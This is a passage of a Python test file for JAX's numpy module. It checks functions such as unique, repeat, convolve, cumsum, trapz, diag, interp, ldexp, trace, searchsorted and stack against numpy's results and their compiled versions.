    self.skipTest("zero-sized axis in unique leads to error in older numpy.")
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(shape, dtype)]
  np_fun = lambda arr: np.unique(arr, return_index, return_inverse, return_counts, axis=axis)
  jnp_fun = lambda arr: jnp.unique(arr, return_index, return_inverse, return_counts, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_size={}".format(
        jtu.format_shape_dtype_string(shape, dtype), size),
     "shape": shape, "dtype": dtype, "size": size}
    for dtype in number_dtypes
    for size in [1, 5, 10]
    for shape in nonempty_array_shapes))
def testUniqueSize(self, shape, dtype, size):
  """jnp.unique with a static `size` must truncate or pad its outputs."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  kwds = dict(return_index=True, return_inverse=True, return_counts=True)
  def np_fun(x):
    # NOTE: the reference deliberately starts from jnp.unique's own (unsized)
    # output and applies the documented truncate/pad rule with numpy, so the
    # test checks only the `size` handling, not unique itself.
    u, ind, inv, counts = jnp.unique(x, **kwds)
    if size <= len(u):
      # Too many uniques: truncate each output to `size`.
      u, ind, counts = u[:size], ind[:size], counts[:size]
    else:
      # Too few: pad values/indices with the first entry, counts with zero.
      extra = size - len(u)
      u = np.concatenate([u, np.full(extra, u[0], u.dtype)])
      ind = np.concatenate([ind, np.full(extra, ind[0], ind.dtype)])
      counts = np.concatenate([counts, np.zeros(extra, counts.dtype)])
    return u, ind, inv, counts
  jnp_fun = lambda x: jnp.unique(x, size=size, **kwds)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_fixed_size={}".format(fixed_size),
     "fixed_size": fixed_size}
    for fixed_size in [True, False]))
def testNonScalarRepeats(self, fixed_size):
  '''
  Tests jnp.repeat with array-valued repeat counts.

  Following numpy test suite from `test_repeat` at
  https://github.com/numpy/numpy/blob/main/numpy/core/tests/test_multiarray.py
  '''
  tol = 1e-5
  def test_single(m, args_maker, repeats, axis):
    # Check the eager result against numpy, then the compiled path.
    lax_ans = jnp.repeat(m, repeats, axis)
    numpy_ans = np.repeat(m, repeats, axis)
    self.assertAllClose(lax_ans, numpy_ans, rtol=tol, atol=tol)
    if fixed_size:
      # Calculate expected size of the repeated axis.
      rep_length = np.repeat(np.zeros_like(m), repeats, axis).shape[axis or 0]
      jnp_fun = lambda arg, rep: jnp.repeat(
          arg, repeats=rep, axis=axis, total_repeat_length=rep_length)
    else:
      jnp_fun = lambda arg: jnp.repeat(arg, repeats = repeats, axis=axis)
    self._CompileAndCheck(jnp_fun, args_maker)
  # 1-D input with scalar and per-element repeat counts.
  m = jnp.array([1,2,3,4,5,6])
  if fixed_size:
    args_maker = lambda: [m, repeats]
  else:
    args_maker = lambda: [m]
  for repeats in [2, jnp.array([1,3,0,1,1,2]), jnp.array([1,3,2,1,1,2]), jnp.array([2])]:
    test_single(m, args_maker, repeats, axis=None)
    test_single(m, args_maker, repeats, axis=0)
  # 2-D input: per-row repeats on axis 0, per-column repeats on axis 1.
  m_rect = m.reshape((2,3))
  if fixed_size:
    args_maker = lambda: [m_rect, repeats]
  else:
    args_maker = lambda: [m_rect]
  for repeats in [2, jnp.array([2,1]), jnp.array([2])]:
    test_single(m_rect, args_maker, repeats, axis=0)
  for repeats in [2, jnp.array([1,3,2]), jnp.array([2])]:
    test_single(m_rect, args_maker, repeats, axis=1)
def testIssue2330(self):
  '''
  Make sure return value of jnp.concatenate is a jax.ndarray and is side-effect safe
  '''
  def attempt_sideeffect(x):
    # If concatenate returned a view of (or aliased) the input, the in-place
    # subtraction below would corrupt the caller's array.
    x = [x]
    x = jnp.concatenate(x)
    x -= 1.
    return x
  np_input = np.ones((1))
  jnp_input = jnp.ones((1))
  expected_np_input_after_call = np.ones((1))
  expected_jnp_input_after_call = jnp.ones((1))
  # The result must be a device array even when built from a numpy input.
  self.assertTrue(xla.type_is_device_array(jnp.concatenate([np_input])))
  attempt_sideeffect(np_input)
  attempt_sideeffect(jnp_input)
  # Neither input may have been mutated by the call above.
  self.assertAllClose(np_input, expected_np_input_after_call)
  self.assertAllClose(jnp_input, expected_jnp_input_after_call)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "op={}_xshape=[{}]_yshape=[{}]_mode={}".format(
        op,
        jtu.format_shape_dtype_string(xshape, dtype),
        jtu.format_shape_dtype_string(yshape, dtype),
        mode),
     "xshape": xshape, "yshape": yshape, "dtype": dtype, "mode": mode,
     "jnp_op": getattr(jnp, op),
     "np_op": getattr(np, op)}
    for mode in ['full', 'same', 'valid']
    for op in ['convolve', 'correlate']
    for dtype in number_dtypes
    for xshape in one_dim_array_shapes
    for yshape in one_dim_array_shapes))
def testConvolutions(self, xshape, yshape, dtype, mode, jnp_op, np_op):
  """Compares jnp convolve/correlate with their numpy counterparts."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(xshape, dtype), rng(yshape, dtype)]
  # Ask for full precision on TPU so results are comparable with numpy.
  precision = lax.Precision.HIGHEST if jtu.device_under_test() == "tpu" else None
  np_fun = partial(np_op, mode=mode)
  jnp_fun = partial(jnp_op, mode=mode, precision=precision)
  tol = {np.float16: 2e-1, np.float32: 1e-2, np.float64: 1e-14,
         np.complex128: 1e-14}
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args, check_dtypes=False,
                          tol=tol)
  self._CompileAndCheck(jnp_fun, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "op={}_shape=[{}]_axis={}_out_dtype={}".format(
        op, jtu.format_shape_dtype_string(shape, dtype), axis,
        out_dtype.__name__),
     "axis": axis, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
     "jnp_op": getattr(jnp, op), "np_op": getattr(np, op)}
    for op in ["cumsum", "cumprod"]
    for dtype in all_dtypes
    for out_dtype in default_dtypes
    for shape in all_shapes
    for axis in [None] + list(range(-len(shape), len(shape)))))
def testCumSumProd(self, axis, shape, dtype, out_dtype, np_op, jnp_op):
  """Check jnp.cumsum/jnp.cumprod against numpy over axes and out dtypes."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg: np_op(arg, axis=axis, dtype=out_dtype)
  # Casting complex inputs to a real out_dtype emits ComplexWarning; the
  # resulting values are what we compare, so silence it on both sides.
  np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
  jnp_fun = lambda arg: jnp_op(arg, axis=axis, dtype=out_dtype)
  jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
  args_maker = lambda: [rng(shape, dtype)]
  # bfloat16 accumulations need a looser tolerance than jtu's defaults.
  tol_thresholds = {dtypes.bfloat16: 4e-2}
  tol = max(jtu.tolerance(dtype, tol_thresholds),
            jtu.tolerance(out_dtype, tol_thresholds))
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "op={}_shape=[{}]_axis={}_out_dtype={}".format(
        op, jtu.format_shape_dtype_string(shape, dtype), axis,
        out_dtype.__name__),
     "axis": axis, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
     "jnp_op": getattr(jnp, op), "np_op": getattr(np, op)}
    for op in ["nancumsum", "nancumprod"]
    for dtype in all_dtypes
    for out_dtype in default_dtypes
    for shape in all_shapes
    for axis in [None] + list(range(-len(shape), len(shape)))))
def testNanCumSumProd(self, axis, shape, dtype, out_dtype, np_op, jnp_op):
  """Check jnp.nancumsum/jnp.nancumprod against numpy on NaN-laden inputs."""
  rng = jtu.rand_some_nan(self.rng())
  np_fun = partial(np_op, axis=axis, dtype=out_dtype)
  # Casting complex values to a real out_dtype emits ComplexWarning; only the
  # resulting values matter here, so suppress it on both sides.
  np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
  jnp_fun = partial(jnp_op, axis=axis, dtype=out_dtype)
  jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
  args_maker = lambda: [rng(shape, dtype)]
  tol_thresholds = {dtypes.bfloat16: 4e-2}
  tol = max(jtu.tolerance(dtype, tol_thresholds),
            jtu.tolerance(out_dtype, tol_thresholds))
  if dtype != jnp.bfloat16:
    # numpy functions do not properly handle bfloat16
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True,
                            tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_yshape={}_xshape={}_dx={}_axis={}".format(
        jtu.format_shape_dtype_string(yshape, dtype),
        jtu.format_shape_dtype_string(xshape, dtype) if xshape is not None else None,
        dx, axis),
     "yshape": yshape, "xshape": xshape, "dtype": dtype, "dx": dx, "axis": axis}
    for dtype in default_dtypes
    for yshape, xshape, dx, axis in [
      ((10,), None, 1.0, -1),
      ((3, 10), None, 2.0, -1),
      ((3, 10), None, 3.0, -0),
      ((10, 3), (10,), 1.0, -2),
      ((3, 10), (10,), 1.0, -1),
      ((3, 10), (3, 10), 1.0, -1),
      ((2, 3, 10), (3, 10), 1.0, -2),
    ]))
@jtu.skip_on_devices("tpu")  # TODO(jakevdp): fix and reenable this test.
@jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
def testTrapz(self, yshape, xshape, dtype, dx, axis):
  """Check jnp.trapz against np.trapz, with and without explicit x samples."""
  rng = jtu.rand_default(self.rng())
  # xshape=None exercises the dx-only code path (x argument passed as None).
  args_maker = lambda: [rng(yshape, dtype), rng(xshape, dtype) if xshape is not None else None]
  np_fun = partial(np.trapz, dx=dx, axis=axis)
  jnp_fun = partial(jnp.trapz, dx=dx, axis=axis)
  tol = jtu.tolerance(dtype, {np.float64: 1e-12,
                              dtypes.bfloat16: 4e-2})
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol=tol,
                          check_dtypes=False)
  self._CompileAndCheck(jnp_fun, args_maker, atol=tol, rtol=tol,
                        check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_dtype={}_m={}_n={}_k={}".format(
        np.dtype(dtype).name, m, n, k),
     "m": m, "n": n, "k": k, "dtype": dtype}
    for dtype in default_dtypes
    for n in [0, 4]
    for m in [None, 0, 1, 3, 4]
    for k in list(range(-4, 4))))
def testTri(self, m, n, k, dtype):
  """jnp.tri agrees with np.tri for every (n, M, k, dtype) combination."""
  np_fun = partial(np.tri, n, M=m, k=k, dtype=dtype)
  jnp_fun = partial(jnp.tri, n, M=m, k=k, dtype=dtype)
  args_maker = list  # nullary: both functions are fully bound already
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_op={}_shape={}_k={}".format(
        op, jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "op": op, "k": k}
    for dtype in default_dtypes
    for shape in [shape for shape in all_shapes if len(shape) >= 2]
    for op in ["tril", "triu"]
    for k in list(range(-3, 3))))
def testTriLU(self, dtype, shape, op, k):
  """jnp.tril/jnp.triu agree with their numpy counterparts for every offset."""
  rng = jtu.rand_default(self.rng())
  np_fun = partial(getattr(np, op), k=k)
  jnp_fun = partial(getattr(jnp, op), k=k)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "n={}_k={}_m={}".format(n, k, m),
     "n": n, "k": k, "m": m}
    for n in range(1, 5)
    for k in [-1, 0, 1]
    for m in range(1, 5)))
def testTrilIndices(self, n, k, m):
  """jnp.tril_indices agrees with np.tril_indices."""
  # Both functions take (n, k, m) positionally, so pass them unwrapped.
  args_maker = lambda: [n, k, m]
  self._CheckAgainstNumpy(np.tril_indices, jnp.tril_indices, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "n={}_k={}_m={}".format(n, k, m),
     "n": n, "k": k, "m": m}
    for n in range(1, 5)
    for k in [-1, 0, 1]
    for m in range(1, 5)))
def testTriuIndices(self, n, k, m):
  """jnp.triu_indices agrees with np.triu_indices."""
  # Both functions take (n, k, m) positionally, so pass them unwrapped.
  args_maker = lambda: [n, k, m]
  self._CheckAgainstNumpy(np.triu_indices, jnp.triu_indices, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_k={}".format(
        jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "k": k}
    for dtype in default_dtypes
    for shape in [(1,1), (1,2), (2,2), (2,3), (3,2), (3,3), (4,4)]
    for k in [-1, 0, 1]))
def testTriuIndicesFrom(self, shape, dtype, k):
  """jnp.triu_indices_from agrees with np.triu_indices_from."""
  rng = jtu.rand_default(self.rng())
  # Both functions accept (arr, k) positionally, so pass them unwrapped.
  args_maker = lambda: [rng(shape, dtype), k]
  self._CheckAgainstNumpy(np.triu_indices_from, jnp.triu_indices_from, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_k={}".format(
        jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "k": k}
    for dtype in default_dtypes
    for shape in [(1,1), (1,2), (2,2), (2,3), (3,2), (3,3), (4,4)]
    for k in [-1, 0, 1]))
def testTrilIndicesFrom(self, shape, dtype, k):
  """jnp.tril_indices_from agrees with np.tril_indices_from."""
  rng = jtu.rand_default(self.rng())
  # Both functions accept (arr, k) positionally, so pass them unwrapped.
  args_maker = lambda: [rng(shape, dtype), k]
  self._CheckAgainstNumpy(np.tril_indices_from, jnp.tril_indices_from, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_ndim={}_n={}".format(ndim, n),
     "ndim": ndim, "n": n}
    for ndim in [0, 1, 4]
    for n in [0, 1, 7]))
def testDiagIndices(self, ndim, n):
  """jnp.diag_indices matches np.diag_indices for each (n, ndim) pair."""
  np_ans = np.diag_indices(n, ndim)
  jnp_ans = jnp.diag_indices(n, ndim)
  np.testing.assert_equal(np_ans, jnp_ans)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "arr_shape={}".format(
        jtu.format_shape_dtype_string(shape, dtype)
    ),
     "dtype": dtype, "shape": shape}
    for dtype in default_dtypes
    for shape in [(1,1), (2,2), (3,3), (4,4), (5,5)]))
def testDiagIndicesFrom(self, dtype, shape):
  """jnp.diag_indices_from agrees with numpy on square arrays."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np.diag_indices_from, jnp.diag_indices_from, make_args)
  self._CompileAndCheck(jnp.diag_indices_from, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_k={}".format(
        jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "k": k}
    for dtype in default_dtypes
    for shape in [shape for shape in all_shapes if len(shape) in (1, 2)]
    for k in list(range(-4, 4))))
def testDiag(self, shape, dtype, k):
  """jnp.diag agrees with np.diag for 1D and 2D inputs over all offsets."""
  rng = jtu.rand_default(self.rng())
  np_fun = partial(np.diag, k=k)
  jnp_fun = partial(jnp.diag, k=k)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_k={}".format(
        jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "k": k}
    for dtype in default_dtypes
    for shape in all_shapes
    for k in range(-4, 4)))
def testDiagFlat(self, shape, dtype, k):
  """Check jnp.diagflat against np.diagflat for all shapes and offsets."""
  rng = jtu.rand_default(self.rng())
  # numpy has inconsistencies for scalar values
  # https://github.com/numpy/numpy/issues/16477
  # jax differs in that it treats scalars values as length-1 arrays
  # (hence the np.atleast_1d on the numpy side only).
  np_fun = lambda arg: np.diagflat(np.atleast_1d(arg), k)
  jnp_fun = lambda arg: jnp.diagflat(arg, k)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_a1_shape={}_a2_shape2={}".format(
        jtu.format_shape_dtype_string(a1_shape, dtype),
        jtu.format_shape_dtype_string(a2_shape, dtype)),
     "dtype": dtype, "a1_shape": a1_shape, "a2_shape": a2_shape}
    for dtype in default_dtypes
    for a1_shape in one_dim_array_shapes
    for a2_shape in one_dim_array_shapes))
def testPolyMul(self, a1_shape, a2_shape, dtype):
  """Check jnp.polymul against np.polymul for 1D coefficient arrays."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg1, arg2: np.polymul(arg1, arg2)
  # NOTE(review): the trimmed variant is compared against numpy while the
  # untrimmed one is only compile-checked — presumably trim_leading_zeros
  # matches numpy's output while the untrimmed form is jit-compatible; confirm.
  jnp_fun_np = lambda arg1, arg2: jnp.polymul(arg1, arg2, trim_leading_zeros=True)
  jnp_fun_co = lambda arg1, arg2: jnp.polymul(arg1, arg2)
  args_maker = lambda: [rng(a1_shape, dtype), rng(a2_shape, dtype)]
  tol = {np.float16: 2e-1, np.float32: 5e-2, np.float64: 1e-13}
  self._CheckAgainstNumpy(np_fun, jnp_fun_np, args_maker, check_dtypes=False, tol=tol)
  self._CompileAndCheck(jnp_fun_co, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_offset={}_axis1={}_axis2={}".format(
        jtu.format_shape_dtype_string(shape, dtype), offset, axis1, axis2),
     "dtype": dtype, "shape": shape, "offset": offset, "axis1": axis1,
     "axis2": axis2}
    for dtype in default_dtypes
    for shape in [shape for shape in all_shapes if len(shape) >= 2]
    for axis1 in range(-len(shape), len(shape))
    for axis2 in [a for a in range(-len(shape), len(shape))
                  if a % len(shape) != axis1 % len(shape)]
    for offset in list(range(-4, 4))))
def testDiagonal(self, shape, dtype, offset, axis1, axis2):
  """jnp.diagonal agrees with np.diagonal over offsets and axis pairs."""
  rng = jtu.rand_default(self.rng())
  np_fun = partial(np.diagonal, offset=offset, axis1=axis1, axis2=axis2)
  jnp_fun = partial(jnp.diagonal, offset=offset, axis1=axis1, axis2=axis2)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    # The label formats the dtype name, so call it "_dtype=" rather than the
    # previous misleading "_shape=".
    {"testcase_name": "_dtype={}_n={}".format(np.dtype(dtype).name, n),
     "dtype": dtype, "n": n}
    for dtype in default_dtypes
    for n in list(range(4))))
def testIdentity(self, n, dtype):
  """Check jnp.identity against np.identity for small n (including n=0)."""
  np_fun = lambda: np.identity(n, dtype)
  jnp_fun = lambda: jnp.identity(n, dtype)
  args_maker = lambda: []
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_period={}_left={}_right={}".format(
        jtu.format_shape_dtype_string(shape, dtype), period, left, right),
     "shape": shape, "dtype": dtype,
     "period": period, "left": left, "right": right}
    for shape in nonempty_shapes
    for period in [None, 0.59]
    for left in [None, 0]
    for right in [None, 1]
    for dtype in default_dtypes
    # following types lack precision for meaningful tests
    if dtype not in [np.int8, np.int16, np.float16, jnp.bfloat16]
    ))
def testInterp(self, shape, dtype, period, left, right):
  """Check jnp.interp against np.interp, including periodic interpolation
  and custom left/right fill values."""
  rng = jtu.rand_default(self.rng(), scale=10)
  kwds = dict(period=period, left=left, right=right)
  np_fun = partial(np.interp, **kwds)
  jnp_fun = partial(jnp.interp, **kwds)
  # args: query points x, sorted sample points xp, sample values fp.
  args_maker = lambda: [rng(shape, dtype), np.sort(rng((20,), dtype)), np.linspace(0, 1, 20)]
  # skip numpy comparison for integer types with period specified, because numpy
  # uses an unstable sort and so results differ for duplicate values.
  if not (period and np.issubdtype(dtype, np.integer)):
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol={np.float32: 2E-4})
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_x1={}_x2={}_x1_rng={}".format(
        jtu.format_shape_dtype_string(x1_shape, x1_dtype),
        jtu.format_shape_dtype_string(x2_shape, np.int32),
        x1_rng_factory_id),
     "x1_shape": x1_shape, "x1_dtype": x1_dtype,
     "x2_shape": x2_shape, "x1_rng_factory": x1_rng_factory,
     "x2_rng_factory": x2_rng_factory}
    for x1_rng_factory_id, x1_rng_factory in
      enumerate([jtu.rand_some_inf_and_nan, jtu.rand_some_zero])
    for x2_rng_factory in [partial(jtu.rand_int, low=-1075, high=1024)]
    for x1_shape, x2_shape in filter(_shapes_are_broadcast_compatible,
                                     itertools.combinations_with_replacement(array_shapes, 2))
    for x1_dtype in default_dtypes))
@jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
def testLdexp(self, x1_shape, x1_dtype, x2_shape, x1_rng_factory, x2_rng_factory):
  """Check jnp.ldexp against np.ldexp over broadcastable shape pairs,
  including inf/NaN mantissas and extreme exponents."""
  # integer types are converted to float64 in numpy's implementation
  if (x1_dtype not in [jnp.bfloat16, np.float16, np.float32]
      and not config.x64_enabled):
    self.skipTest("Only run float64 testcase when float64 is enabled.")
  x1_rng = x1_rng_factory(self.rng())
  x2_rng = x2_rng_factory(self.rng())
  np_fun = lambda x1, x2: np.ldexp(x1, x2)
  # Large exponents overflow by design; silence numpy's overflow warning.
  np_fun = jtu.ignore_warning(category=RuntimeWarning,
                              message="overflow.*")(np_fun)
  jnp_fun = lambda x1, x2: jnp.ldexp(x1, x2)
  args_maker = lambda: [x1_rng(x1_shape, x1_dtype),
                        x2_rng(x2_shape, np.int32)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_x={}_rng_factory={}".format(
        jtu.format_shape_dtype_string(shape, dtype), rng_factory_id),
     "shape": shape, "dtype": dtype, "rng_factory": rng_factory}
    for rng_factory_id, rng_factory in enumerate([
      jtu.rand_some_inf_and_nan,
      jtu.rand_some_zero,
      partial(jtu.rand_not_small, offset=1e8),
    ])
    for shape in all_shapes
    for dtype in default_dtypes))
def testFrexp(self, shape, dtype, rng_factory):
  """Check jnp.frexp against np.frexp, incl. inf/NaN, zeros, large values."""
  # integer types are converted to float64 in numpy's implementation
  if (dtype not in [jnp.bfloat16, np.float16, np.float32]
      and not config.x64_enabled):
    self.skipTest("Only run float64 testcase when float64 is enabled.")
  rng = rng_factory(self.rng())
  np_fun = lambda x: np.frexp(x)
  jnp_fun = lambda x: jnp.frexp(x)
  args_maker = lambda: [rng(shape, dtype)]
  # dtype equality is only checked for inexact inputs; integer inputs go
  # through numpy's float64 conversion noted above.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=np.issubdtype(dtype, np.inexact))
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_dtype_{}_offset={}_axis1={}_axis2={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        out_dtype, offset, axis1, axis2),
     "dtype": dtype, "out_dtype": out_dtype, "shape": shape, "offset": offset,
     "axis1": axis1, "axis2": axis2}
    for dtype in default_dtypes
    for out_dtype in [None] + number_dtypes
    for shape in [shape for shape in all_shapes if len(shape) >= 2]
    for axis1 in range(-len(shape), len(shape))
    for axis2 in range(-len(shape), len(shape))
    if (axis1 % len(shape)) != (axis2 % len(shape))
    for offset in list(range(-4, 4))))
def testTrace(self, shape, dtype, out_dtype, offset, axis1, axis2):
  """Check jnp.trace against np.trace over offsets, axis pairs, out dtypes."""
  rng = jtu.rand_default(self.rng())
  def np_fun(arg):
    if out_dtype == jnp.bfloat16:
      # Work around numpy's bfloat16 handling: accumulate in float32,
      # then cast the result back.
      return np.trace(arg, offset, axis1, axis2, np.float32).astype(jnp.bfloat16)
    else:
      return np.trace(arg, offset, axis1, axis2, out_dtype)
  jnp_fun = lambda arg: jnp.trace(arg, offset, axis1, axis2, out_dtype)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_a={}_v={}_side={}".format(
        jtu.format_shape_dtype_string(ashape, dtype),
        jtu.format_shape_dtype_string(vshape, dtype),
        side), "ashape": ashape, "vshape": vshape, "side": side,
     "dtype": dtype}
    for ashape in [(15,), (16,), (17,)]
    for vshape in [(), (5,), (5, 5)]
    for side in ['left', 'right']
    for dtype in default_dtypes
    ))
def testSearchsorted(self, ashape, vshape, side, dtype):
  """jnp.searchsorted agrees with np.searchsorted for both insertion sides."""
  rng = jtu.rand_default(self.rng())
  def args_maker():
    # searchsorted requires the haystack to be sorted.
    return [np.sort(rng(ashape, dtype)), rng(vshape, dtype)]
  np_fun = partial(np.searchsorted, side=side)
  jnp_fun = partial(jnp.searchsorted, side=side)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_x={}_bins={}_right={}_reverse={}".format(
        jtu.format_shape_dtype_string(xshape, dtype),
        jtu.format_shape_dtype_string(binshape, dtype),
        right, reverse), "xshape": xshape, "binshape": binshape,
     "right": right, "reverse": reverse, "dtype": dtype}
    for xshape in [(20,), (5, 4)]
    for binshape in [(1,), (5,)]
    for right in [True, False]
    for reverse in [True, False]
    for dtype in default_dtypes
    ))
def testDigitize(self, xshape, binshape, right, reverse, dtype):
  """Check jnp.digitize against np.digitize for both `right` settings, with
  both increasing and (reverse=True) decreasing bin edges."""
  order = jax.ops.index[::-1] if reverse else jax.ops.index[:]
  rng = jtu.rand_default(self.rng())
  # Bin edges are sorted, then optionally reversed to get a decreasing array.
  args_maker = lambda: [rng(xshape, dtype), jnp.sort(rng(binshape, dtype))[order]]
  np_fun = lambda x, bins: np.digitize(x, bins, right=right)
  jnp_fun = lambda x, bins: jnp.digitize(x, bins, right=right)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_array={}".format(
        jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), array_input),
     "shape": shape, "dtypes": dtypes, "array_input": array_input}
    for dtypes in [
      [np.float32],
      [np.float32, np.float32],
      [np.float32, np.int32, np.float32],
      [np.float32, np.int64, np.float32],
      [np.float32, np.int32, np.float64],
    ]
    for shape in [(), (2,), (3, 4), (1, 5)]
    for array_input in [True, False]))
def testColumnStack(self, shape, dtypes, array_input):
  """Check jnp.column_stack against numpy for mixed-dtype lists and arrays."""
  rng = jtu.rand_default(self.rng())
  if array_input:
    args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
  else:
    args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
  np_fun = _promote_like_jnp(np.column_stack)
  jnp_fun = jnp.column_stack
  # numpy reference comes first: _CheckAgainstNumpy(numpy_reference_op,
  # lax_op, ...), consistent with every other call in this file.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_array={}".format(
        jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), axis, array_input),
     "shape": shape, "axis": axis, "dtypes": dtypes, "array_input": array_input}
    for dtypes in [
      [np.float32],
      [np.float32, np.float32],
      [np.float32, np.int32, np.float32],
      [np.float32, np.int64, np.float32],
      [np.float32, np.int32, np.float64],
    ]
    for shape in [(), (2,), (3, 4), (1, 100)]
    for axis in range(-len(shape), len(shape) + 1)
    for array_input in [True, False]))
def testStack(self, shape, axis, dtypes, array_input):
  """Check jnp.stack against numpy for mixed dtypes over all stack axes."""
  rng = jtu.rand_default(self.rng())
  if array_input:
    args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
  else:
    args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
  np_fun = _promote_like_jnp(partial(np.stack, axis=axis))
  jnp_fun = partial(jnp.stack, axis=axis)
  # numpy reference comes first: _CheckAgainstNumpy(numpy_reference_op,
  # lax_op, ...), consistent with every other call in this file.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_op={}_{}_array={}".format(
        op, jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), array_input),
     "shape": shape, "op": op, "dtypes": dtypes, "array_input": array_input}
    for op in ["hstack", "vstack", "dstack"]
    for dtypes in [
      [np.float32],
      [np.float32, np.float32],
      [np.float32, np.int32, np.float32],
      [np.float32, np.int64, np.float32],
      [np.float32, np.int32, np.float64],
    ]
